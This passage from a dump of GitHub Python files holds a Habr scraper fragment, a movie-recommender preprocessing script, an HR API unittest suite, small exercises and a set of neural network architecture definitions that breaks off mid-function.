{'post_wrapper', 'post__wrapper'}})\r\n author_block = soup.find( 'div', attrs={'class': 'author-panel'})\r\n tags_block = wrapper.find( 'dl', attrs={'class': 'post__tags'})\r\n hubs_block = wrapper.find( 'dl', attrs={'class': 'post__tags'} )\r\n\r\n #title\r\n result['title'] = wrapper.find('span', attrs={'class': 'post__title-text'}).text\r\n #author\r\n author_block_spec = author_block.find( 'div', attrs={'class': 'user-info__about'} )\r\n author_info = author_block_spec.find('a', attrs={'class': 'user-info__fullname'})\r\n if not author_info:\r\n author_info = author_block_spec.find('a', attrs={'class': 'user-info__nickname'})\r\n result['author'] = author_info.text\r\n result['author_url'] = author_info.get('href')\r\n\r\n #tags\r\n tags_block_spec = tags_block.find('dd', attrs={'class': 'post__tags-list'})\r\n tags_info = tags_block_spec.find_all('li', attrs={'class': 'inline-list__item_tag'})\r\n tags = set((tag.find('a', attrs = {'class': 'post__tag', 'rel': 'tag'}).text,\r\n tag.find('a', attrs = {'class': 'post__tag', 'rel': 'tag'}).get(\"href\"))\r\n for tag in tags_info)\r\n result['tags'] = tags\r\n\r\n #hubs\r\n hubs_block_spec = hubs_block.find_next('dd', attrs={'class': 'post__tags-list'})\r\n hubs_info = hubs_block_spec.find_all('li', attrs={'class': 'inline-list__item_tag'})\r\n hubs = set((hub.find('a', attrs={'class': 'post__tag', 'rel': 'tag'}).text,\r\n hub.find('a', attrs={'class': 'post__tag', 'rel': 'tag'}).get(\"href\"))\r\n for hub in hubs_info)\r\n result['hubs'] = hubs\r\n return result\r\n\r\n def parse(self):\r\n self.parse_rows()\r\n self.post_page_parse()\r\n\r\nif __name__ == '__main__':\r\n parser = HabrParser()\r\n parser.parse()\r\n\r\n","repo_name":"EkaterinaArseneva/data_mining_EA","sub_path":"lessons1-4/ht3_parser.py","file_name":"ht3_parser.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14362004817","text":"import pandas as pd\nimport json\nimport numpy as np\nimport spacy\nfrom nltk.stem import PorterStemmer\nfrom nltk.tokenize import word_tokenize\n\ndef fetch_name_from_dict(obj):\n L = []\n obj = json.loads(obj)\n for info in obj:\n L.append(info['name'])\n return L\n\ndef fetch_director(obj):\n L = []\n obj = json.loads(obj)\n for info in obj:\n if info['job']=='Director':\n L.append(info['name'])\n return L\n\ndef top_4_cast(obj):\n L = []\n counter = 0\n obj = json.loads(obj)\n for info in obj:\n if counter < 4:\n L.append(info['name'])\n counter += 1\n else:\n break\n return L\n\ndef stemming(sent):\n ps = PorterStemmer()\n stem_tokens = [ps.stem(token) for token in sent.split()]\n stem_sent = \" \".join(stem_tokens)\n return stem_sent\n\ndef lemmatize(sents): # taking around half a minute\n nlp = spacy.load(\"en_core_web_sm\")\n docs = sents.tolist()\n lem_sents = []\n for doc in nlp.pipe(docs, batch_size=512, n_process=3, disable=[\"parser\", \"ner\"]):\n lem_tokens = [token.lemma_ for token in doc]\n lem_sent = \" \".join(lem_tokens)\n lem_sents.append(lem_sent)\n return lem_sents\n\ndef preprocess(df):\n df = df.rename(columns={'title_x':'title'})\n # # # feature to consider\n # # genres\n # # id\n # # keywords\n # # original_language\n # # overview\n # # title\n # # cast\n # # crew\n df = df[['genres','id','keywords','original_language','overview','title','cast','crew']]\n df = df.dropna().reset_index(drop=True)\n\n df['genres'] = df['genres'].apply(fetch_name_from_dict)\n df['keywords'] = df['keywords'].apply(fetch_name_from_dict)\n df['crew'] = df['crew'].apply(fetch_director)\n df = df.rename(columns={'crew':'director'})\n df['cast'] = df['cast'].apply(top_4_cast)\n \n ### removing spaces ###\n df['genres'] = df['genres'].apply(lambda x:[a.replace(\" \",\"\") for a in x])\n df['cast'] = df['cast'].apply(lambda x:[a.replace(\" \",\"\") for a in x])\n df['director'] = df['director'].apply(lambda x:[a.replace(\" \",\"\") for a in x])\n df['keywords'] = df['keywords'].apply(lambda x:[a.replace(\" \",\"\") for a in x])\n \n ### Lemmatizing/Stemming \"overview\" ###\n # df['overview'] = lemmatize(df.overview)\n df['overview'] = df['overview'].apply(stemming)\n\n ### creating tag out of features ###\n df['overview'] = df['overview'].apply(lambda x: [x])\n df['original_language'] = df['original_language'].apply(lambda x:[x])\n df['tags'] = df['overview'] + df['genres'] + df['keywords'] + df['original_language'] + df['cast'] + df['director']\n df['tags'] = df['tags'].apply(lambda x: \" \".join(x))\n df['tags'] = df['tags'].apply(lambda x: x.lower())\n df = df[['id','title','tags']]\n \n return df\n\n\n\n","repo_name":"shifu-dev/Content-Based-Movie-Recommender-System","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"469099000","text":"# 创建测试类\n# 编写测试函数\nimport logging\nimport unittest\nimport app\nfrom api.employee_api import TestEmployeeApi\nfrom api.login_api import LoginApi\nfrom utiles import assert_comment\n\n\nclass TestIhrmEmployee3(unittest.TestCase):\n def setUp(self):\n self.emp_api = TestEmployeeApi()\n self.login_api = LoginApi()\n\n def test_01_login(self):\n response = self.login_api.login({\"mobile\": \"13800000002\", \"password\": \"123456\"},\n {\"Content-Type\": \"application/json\"})\n\n logging.info(\"登录的结果为:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n\n # 获取令牌\n token = response.json().get('data')\n\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + token}\n app.HEADERS = headers\n\n\n def test_02_add_emp(self):\n response = self.emp_api.add_emp(app.HEADERS, \"小偷家族77\", \"17512345677\")\n logging.info(\"添加员工的结果是:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n emp_id = response.json().get(\"data\").get(\"id\")\n app.EMP_ID = emp_id\n\n\n def test_03_query_emp(self):\n response = self.emp_api.query_emp(app.EMP_ID, app.HEADERS)\n logging.info(\"查询员工的结果是:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n\n def test_04_mpdify_emp(self):\n response = self.emp_api.modify_emp(app.EMP_ID, app.HEADERS,\"古力娜扎\")\n logging.info(\"修改员工的结果为:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n\n def test_05_delete_emp(self):\n response = self.emp_api.delete_emp(app.EMP_ID, app.HEADERS)\n logging.info(\"删除员工的结果为:{}\".format(response.json()))\n assert_comment(200, 10000, True, \"操作成功\", response, self)\n","repo_name":"tiantiankaixin2020/test_ihrm_priject","sub_path":"script/test_ihrm_employee_3.py","file_name":"test_ihrm_employee_3.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18658061243","text":"import math\nclass Solution:\n def getPermutation(self, n, k):\n num = [str(i) for i in range(1, n+1)]\n res = \"\"\n n -= 1\n while n > -1:\n t = math.factorial(n) #数量\n loc = math.ceil(k / t) -1\n res += num[loc]\n num.pop(loc)\n k %= t\n n -= 1\n return res\n\nprint( )","repo_name":"Francis1998/leetcode","sub_path":"14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"11532582113","text":"from Contact import Contact\nimport json\n\nclass PhoneBook:\n contacts = []\n \n @property\n def size(self):\n return len(self.contacts)\n\n def load(self, file: str) -> None:\n \"\"\"Reads the phone book from a file\"\"\"\n with open(file, \"r\") as f:\n self.contacts = json.loads(f.read())\n \n def save(self, destination: str) -> None:\n \"\"\"Saves the phone book as a dictionary to a file designated by the user\"\"\"\n with open(destination, \"w\") as f:\n f.write(json.dumps(self.contacts, indent=4))\n\n def add_contact(self, *people_to_add: Contact) -> None:\n \"\"\"Add a contact to a phone book\"\"\"\n for person in people_to_add:\n personal_information = {\n \"Name\": person.name.capitalize(),\n \"Lastname\": person.lastname.capitalize(),\n \"Phone number\": person.phone_number\n }\n self.contacts.append(personal_information)\n\n def del_contact(self, name: str, lastname: str) -> None:\n \"\"\"Delete a contact from a phone book\"\"\"\n for i, person in enumerate(self.contacts):\n if (person['Name'], person['Lastname']) == (name.capitalize(), lastname.capitalize()):\n self.contacts.pop(i)\n print(f\"\\n{name.capitalize()} {lastname.capitalize()} deleted.\\n\")\n break\n else:\n print(f\"\\nNo {name} {lastname} found in the Phone book.\\n\")\n\n def __len__(self) -> int:\n return self.size\n\n def __str__(self) -> str:\n strng = \"\"\n for contact in self.contacts:\n for key, value in contact.items():\n strng = f\"{strng}{key}: {value}\\t\\t\"\n strng = f\"{strng}\\n\"\n return strng\n\n def __repr__(self) -> str:\n return f\"PhoneBook class: {self.contacts}\"","repo_name":"veern/Learning-Python","sub_path":"PhoneBook/PhoneBook.py","file_name":"PhoneBook.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31371294543","text":"import gzip\nimport typing\nfrom os.path import exists\nfrom typing import List, Optional, Sequence, Tuple, Type\n\nimport onnx # type: ignore[import]\nimport torch\nfrom bunch import Bunch # type: ignore[import]\nimport numpy as np\n\nfrom torch import nn as nn\n\nfrom src.concrete_layers.basic_block import BasicBlock\nfrom src.concrete_layers.pad import Pad\nfrom src.utilities.onnx_loader import ConvertModel\n\n\ndef lecture_network_small() -> nn.Sequential:\n net = nn.Sequential(\n *[\n nn.Linear(in_features=2, out_features=2),\n nn.ReLU(),\n nn.Linear(in_features=2, out_features=1),\n ]\n )\n net[0].weight.data = torch.ones_like(net[0].weight.data)\n net[0].weight.data[1, 1] = -1.\n net[0].bias.data = torch.zeros_like(net[0].bias.data)\n\n net[2].weight.data = torch.ones_like(net[2].weight.data)\n net[2].bias.data[0] = -0.5\n return net\n\n\ndef lecture_network() -> nn.Sequential:\n net = nn.Sequential(\n *[\n nn.Linear(in_features=2, out_features=2),\n nn.ReLU(),\n nn.Linear(in_features=2, out_features=2),\n nn.ReLU(),\n nn.Linear(in_features=2, out_features=2)\n ]\n )\n\n net[0].weight.data = torch.ones_like(net[0].weight.data)\n net[0].weight.data[1, 1] = -1.\n net[0].bias.data = torch.zeros_like(net[0].bias.data)\n\n net[2].weight.data = torch.ones_like(net[2].weight.data)\n net[2].weight.data[1, 1] = -1.\n net[2].bias.data = torch.tensor([-0.5, 0])\n\n net[4].weight.data = torch.ones_like(net[4].weight.data)\n net[4].weight.data[0, 0] = -1.\n net[4].weight.data[1, 0] = 0\n net[4].bias.data = torch.tensor([3., 0])\n return net\n\ndef mnist_conv_tiny() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(in_channels=1, out_channels=4, kernel_size=4, stride=4),\n nn.ReLU(),\n nn.Conv2d(in_channels=4, out_channels=8, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=8 * 2 * 2, out_features=50),\n nn.ReLU(),\n nn.Linear(in_features=50, out_features=10),\n ]\n )\n\n\ndef mnist_conv_small() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=32 * 5 * 5, out_features=100),\n nn.ReLU(),\n nn.Linear(in_features=100, out_features=10),\n ]\n )\n\n\ndef mnist_conv_sigmoid_small() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, stride=2),\n nn.Sigmoid(),\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, stride=2),\n nn.Sigmoid(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=32 * 5 * 5, out_features=100),\n nn.Sigmoid(),\n nn.Linear(in_features=100, out_features=10),\n ]\n )\n\n\ndef mnist_conv_big() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(\n in_channels=1, out_channels=32, kernel_size=3, stride=1, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=32, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=64, out_channels=64, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=64 * 7 * 7, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=10),\n ]\n )\n\n\ndef mnist_conv_super() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(\n in_channels=1, out_channels=32, kernel_size=3, stride=1, padding=0\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=32, kernel_size=4, stride=1, padding=0\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=0\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=64, out_channels=64, kernel_size=4, stride=1, padding=0\n ),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=64 * 18 * 18, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=10),\n ]\n )\n\n\ndef mnist_a_b(a: int, b: int) -> nn.Sequential:\n layers = [nn.Linear(28 * 28, b), nn.ReLU()]\n for __ in range(a - 1):\n layers += [\n nn.Linear(b, b),\n nn.ReLU(),\n ]\n layers += [nn.Linear(b, 10), nn.ReLU()]\n return nn.Sequential(*layers)\n\n\ndef mnist_sig_a_b(a: int, b: int) -> nn.Sequential:\n layers = [nn.Linear(28 * 28, b), nn.Sigmoid()]\n for __ in range(a - 1):\n layers += [\n nn.Linear(b, b),\n nn.Sigmoid(),\n ]\n layers += [nn.Linear(b, 10), nn.Sigmoid()]\n return nn.Sequential(*layers)\n\n\ndef mnist_vnncomp_a_b(a: int, b: int) -> nn.Sequential:\n layers = [nn.Flatten(start_dim=1, end_dim=-1), nn.Linear(28 * 28, b), nn.ReLU()]\n for __ in range(a - 1):\n layers += [\n nn.Linear(b, b),\n nn.ReLU(),\n ]\n layers += [nn.Linear(b, 10)]\n return nn.Sequential(*layers)\n\n\ndef cifar10_conv_small() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(in_channels=3, out_channels=16, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=32 * 6 * 6, out_features=100),\n nn.ReLU(),\n nn.Linear(in_features=100, out_features=10),\n ]\n )\n\n\ndef cifar10_cnn_A() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(\n in_channels=3, out_channels=16, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=16, out_channels=32, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=32 * 8 * 8, out_features=100),\n nn.ReLU(),\n nn.Linear(in_features=100, out_features=10),\n ]\n )\n\ndef cifar10_cnn_B():\n return nn.Sequential(\n Pad((1,2,1,2)),\n nn.Conv2d(3, 32, (5,5), stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 128, (4,4), stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(8192, 250),\n nn.ReLU(),\n nn.Linear(250, 10),\n )\n\n\ndef mnist_cnn_A():\n return nn.Sequential(\n nn.Conv2d(1, 16, (4,4), stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(16, 32, (4,4), stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(1568, 100),\n nn.ReLU(),\n nn.Linear(100, 10),\n )\n\ndef cifar10_base() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 8, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(8, 16, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(1024, 100),\n nn.ReLU(),\n nn.Linear(100, 10),\n )\n\n\ndef cifar10_wide() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 16, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(16, 32, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(32 * 8 * 8, 100),\n nn.ReLU(),\n nn.Linear(100, 10),\n )\n\n\ndef cifar10_deep() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 8, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(8, 8, 3, stride=1, padding=1),\n nn.ReLU(),\n nn.Conv2d(8, 8, 3, stride=1, padding=1),\n nn.ReLU(),\n nn.Conv2d(8, 8, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(8 * 8 * 8, 100),\n nn.ReLU(),\n nn.Linear(100, 10),\n )\n\n\ndef cifar10_2_255_simplified() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 32, 3, stride=1, padding=1),\n nn.ReLU(),\n nn.Conv2d(32, 32, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(32, 128, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(128 * 8 * 8, 250),\n nn.ReLU(),\n nn.Linear(250, 10),\n )\n\n\ndef cifar10_8_255_simplified() -> nn.Sequential:\n return nn.Sequential(\n nn.Conv2d(3, 32, 5, stride=2, padding=2),\n nn.ReLU(),\n nn.Conv2d(32, 128, 4, stride=2, padding=1),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(128 * 8 * 8, 250),\n nn.ReLU(),\n nn.Linear(250, 10),\n )\n\n\ndef cifar10_conv_big() -> nn.Sequential:\n return nn.Sequential(\n *[\n nn.Conv2d(\n in_channels=3, out_channels=32, kernel_size=3, stride=1, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=32, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1\n ),\n nn.ReLU(),\n nn.Conv2d(\n in_channels=64, out_channels=64, kernel_size=4, stride=2, padding=1\n ),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1),\n nn.Linear(in_features=64 * 8 * 8, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=512),\n nn.ReLU(),\n nn.Linear(in_features=512, out_features=10),\n ]\n )\n\n\ndef getShapeConv(\n in_shape: Tuple[int, int, int],\n conv_shape: Tuple[int, ...],\n stride: int = 1,\n padding: int = 0,\n) -> Tuple[int, int, int]:\n inChan, inH, inW = in_shape\n outChan, kH, kW = conv_shape[:3]\n\n outH = 1 + int((2 * padding + inH - kH) / stride)\n outW = 1 + int((2 * padding + inW - kW) / stride)\n return (outChan, outH, outW)\n\n\nclass ResNet(nn.Sequential):\n def __init__(\n self,\n block: Type[BasicBlock],\n in_ch: int = 3,\n num_stages: int = 1,\n num_blocks: int = 2,\n num_classes: int = 10,\n in_planes: int = 64,\n bn: bool = True,\n last_layer: str = \"avg\",\n in_dim: int = 32,\n stride: Optional[Sequence[int]] = None,\n ):\n layers: List[nn.Module] = []\n self.in_planes = in_planes\n if stride is None:\n stride = (num_stages + 1) * [2]\n\n layers.append(\n nn.Conv2d(\n in_ch,\n self.in_planes,\n kernel_size=3,\n stride=stride[0],\n padding=1,\n bias=not bn,\n )\n )\n\n _, _, in_dim = getShapeConv(\n (in_ch, in_dim, in_dim), (self.in_planes, 3, 3), stride=stride[0], padding=1\n )\n\n if bn:\n layers.append(nn.BatchNorm2d(self.in_planes))\n\n layers.append(nn.ReLU())\n\n for s in stride[1:]:\n block_layers, in_dim = self._make_layer(\n block,\n self.in_planes * 2,\n num_blocks,\n stride=s,\n bn=bn,\n kernel=3,\n in_dim=in_dim,\n )\n layers.append(block_layers)\n\n if last_layer == \"avg\":\n layers.append(nn.AvgPool2d(4))\n layers.append(nn.Flatten())\n layers.append(\n nn.Linear(\n self.in_planes * (in_dim // 4) ** 2 * block.expansion, num_classes\n )\n )\n elif last_layer == \"dense\":\n layers.append(nn.Flatten())\n layers.append(\n nn.Linear(self.in_planes * block.expansion * in_dim**2, 100)\n )\n layers.append(nn.ReLU())\n layers.append(nn.Linear(100, num_classes))\n else:\n exit(\"last_layer type not supported!\")\n\n super(ResNet, self).__init__(*layers)\n\n def _make_layer(\n self,\n block: Type[BasicBlock],\n planes: int,\n num_layers: int,\n stride: int,\n bn: bool,\n kernel: int,\n in_dim: int,\n ) -> Tuple[nn.Sequential, int]:\n strides = [stride] + [1] * (num_layers - 1)\n cur_dim: int = in_dim\n layers: List[nn.Module] = []\n for stride in strides:\n layer = block(self.in_planes, planes, stride, bn, kernel, in_dim=cur_dim)\n layers.append(layer)\n cur_dim = layer.out_dim\n layers.append(nn.ReLU())\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers), cur_dim\n\n\ndef resnet2b(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock, num_stages=1, num_blocks=2, in_planes=8, bn=bn, last_layer=\"dense\"\n )\n\n\ndef resnet2b2(bn: bool = False, in_ch: int = 3, in_dim: int = 32) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=in_ch,\n num_stages=2,\n num_blocks=1,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n stride=[2, 2, 2],\n )\n\n\ndef resnet4b(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock, num_stages=2, num_blocks=2, in_planes=8, bn=bn, last_layer=\"dense\"\n )\n\n\ndef resnet4b1(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=3,\n num_stages=4,\n num_blocks=1,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n stride=[1, 1, 2, 2, 2],\n )\n\n\ndef resnet4b2(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=3,\n num_stages=4,\n num_blocks=1,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n stride=[2, 2, 2, 1, 1],\n )\n\n\ndef resnet3b2(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=3,\n num_stages=3,\n num_blocks=1,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n stride=[2, 2, 2, 2],\n )\n\n\ndef resnet9b(bn: bool = False) -> nn.Sequential:\n return ResNet(\n BasicBlock,\n in_ch=3,\n num_stages=3,\n num_blocks=3,\n in_planes=16,\n bn=bn,\n last_layer=\"dense\",\n )\n\ndef ConvMedBig(dataset, bn=False, bn2=False, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch, conv_widths=[2,2,8], kernel_sizes=[3,4,4],\n linear_sizes=[250], strides=[1,2,2], paddings=[1, 1, 1], net_dim=None, bn=bn, bn2=bn2)\n\ndef ConvMed(dataset, bn=False, bn2=False, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch, conv_widths=[2,4], kernel_sizes=[5,4],\n linear_sizes=[100], strides=[2,2], paddings=[2,1], net_dim=None, bn=bn, bn2=bn2)\n\ndef ConvMed2(dataset, bn=False, bn2=False, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch, conv_widths=[2,8], kernel_sizes=[5,4],\n linear_sizes=[250], strides=[2,2], paddings=[2,1], net_dim=None, bn=bn, bn2=bn2)\n\ndef ConvMed_tiny(dataset, bn=False, bn2=False, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch, conv_widths=[1,2], kernel_sizes=[5,4],\n linear_sizes=[50], strides=[2,2], paddings=[1,1], net_dim=None, bn=bn, bn2=bn2)\n\nclass myNet(nn.Module):\n def __init__(self, device, dataset, n_class=10, input_size=32, input_channel=3, conv_widths=None,\n kernel_sizes=None, linear_sizes=None, depth_conv=None, paddings=None, strides=None,\n dilations=None, pool=False, net_dim=None, bn=False, bn2=False, max=False, scale_width=True):\n super(myNet, self).__init__()\n if kernel_sizes is None:\n kernel_sizes = [3]\n if conv_widths is None:\n conv_widths = [2]\n if linear_sizes is None:\n linear_sizes = [200]\n if paddings is None:\n paddings = [1]\n if strides is None:\n strides = [2]\n if dilations is None:\n dilations = [1]\n if net_dim is None:\n net_dim = input_size\n\n if len(conv_widths) != len(kernel_sizes):\n kernel_sizes = len(conv_widths) * [kernel_sizes[0]]\n if len(conv_widths) != len(paddings):\n paddings = len(conv_widths) * [paddings[0]]\n if len(conv_widths) != len(strides):\n strides = len(conv_widths) * [strides[0]]\n if len(conv_widths) != len(dilations):\n dilations = len(conv_widths) * [dilations[0]]\n\n self.n_class=n_class\n self.input_size=input_size\n self.input_channel=input_channel\n self.conv_widths=conv_widths\n self.kernel_sizes=kernel_sizes\n self.paddings=paddings\n self.strides=strides\n self.dilations = dilations\n self.linear_sizes=linear_sizes\n self.depth_conv=depth_conv\n self.net_dim = net_dim\n self.bn=bn\n self.bn2 = bn2\n self.max=max\n\n layers = []\n\n N = net_dim\n n_channels = input_channel\n self.dims = [(n_channels,N,N)]\n\n for width, kernel_size, padding, stride, dilation in zip(conv_widths, kernel_sizes, paddings, strides, dilations):\n if scale_width:\n width *= 16\n N = int(np.floor((N + 2 * padding - dilation * (kernel_size - 1) - 1) / stride + 1))\n layers += [nn.Conv2d(n_channels, int(width), kernel_size, stride=stride, padding=padding, dilation=dilation)]\n if self.bn:\n layers += [nn.BatchNorm2d(int(width))]\n if self.max:\n layers += [nn.MaxPool2d(int(width))]\n layers += [nn.ReLU((int(width), N, N))]\n n_channels = int(width)\n self.dims += 2*[(n_channels,N,N)]\n\n if depth_conv is not None:\n layers += [nn.Conv2d(n_channels, depth_conv, 1, stride=1, padding=0),\n nn.ReLU((n_channels, N, N))]\n n_channels = depth_conv\n self.dims += 2*[(n_channels,N,N)]\n\n if pool:\n layers += [nn.GlobalAvgPool2d()]\n self.dims += 2 * [(n_channels, 1, 1)]\n N=1\n\n layers += [nn.Flatten()]\n N = n_channels * N ** 2\n self.dims += [(N,)]\n\n for width in linear_sizes:\n if width == 0:\n continue\n layers += [nn.Linear(int(N), int(width))]\n if self.bn2:\n layers += [nn.BatchNorm1d(int(width))]\n layers += [nn.ReLU(width)]\n N = width\n self.dims+=2*[(N,)]\n\n layers += [nn.Linear(N, n_class)]\n self.dims+=[(n_class,)]\n\n self.blocks = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.blocks(x)\n\n\nclass CNN7(myNet):\n def __init__(self, device, dataset, n_class=10, input_size=32, input_channel=3, width1=4, width2=8, linear_size=512,\n net_dim=None, bn=False, bn2=False):\n super(CNN7, self).__init__(device, dataset, n_class, input_size, input_channel,\n conv_widths=[width1, width1, width2, width2, width2], kernel_sizes=[3, 3, 3, 3, 3],\n linear_sizes=[linear_size], strides=[1, 1, 2, 1, 1], paddings=[1, 1, 1, 1, 1],\n net_dim=net_dim, bn=bn, bn2=bn2)\n\n\ndef CNNA(dataset, bn, device=\"cuda\"):\n in_ch, in_dim, n_class = get_dataset_info(dataset)\n return myNet(device, dataset, n_class, in_dim, in_ch,\n conv_widths=[16, 32], kernel_sizes=[4, 4],\n linear_sizes=[100], strides=[2, 2], paddings=[1, 1],\n net_dim=None, bn=bn)\n\n\ndef get_dataset_info(dataset):\n if dataset == \"mnist\":\n return 1, 28, 10\n elif dataset == \"emnist\":\n return 1, 28, 10\n elif dataset == \"fashionmnist\":\n return 1, 28, 10\n if dataset == \"svhn\":\n return 3, 32, 10\n elif dataset == \"cifar10\":\n return 3, 32, 10\n elif dataset == \"tinyimagenet\":\n return 3, 56, 200\n else:\n raise ValueError(f\"Dataset {dataset} not available\")\n\n\ndef freeze_network(network: nn.Module) -> None:\n for param in network.parameters():\n param.requires_grad = False\n\n\ndef load_net_from(config: Bunch) -> nn.Module:\n path = config.network_path\n try:\n n_layers = config.n_layers\n n_neurons_per_layer = config.n_neurons_per_layer\n except AttributeError:\n n_layers = None\n n_neurons_per_layer = None\n return load_net(path, n_layers, n_neurons_per_layer)\n\n\ndef load_net( # noqa: C901\n path: str, n_layers: Optional[int], n_neurons_per_layer: Optional[int]\n) -> nn.Module:\n if path.split(\".\")[-1] in [\"onnx\", \"gz\"]:\n return load_onnx_model(path)[0]\n elif \"mnist_sig\" in path and \"flattened\" in path:\n assert n_layers is not None and n_neurons_per_layer is not None\n original_network = mnist_sig_a_b(n_layers, n_neurons_per_layer)\n elif \"mnist\" in path and \"flattened\" in path:\n assert n_layers is not None and n_neurons_per_layer is not None\n original_network = mnist_a_b(n_layers, n_neurons_per_layer)\n elif \"mnist-net\" in path:\n assert n_layers is not None and n_neurons_per_layer is not None\n original_network = 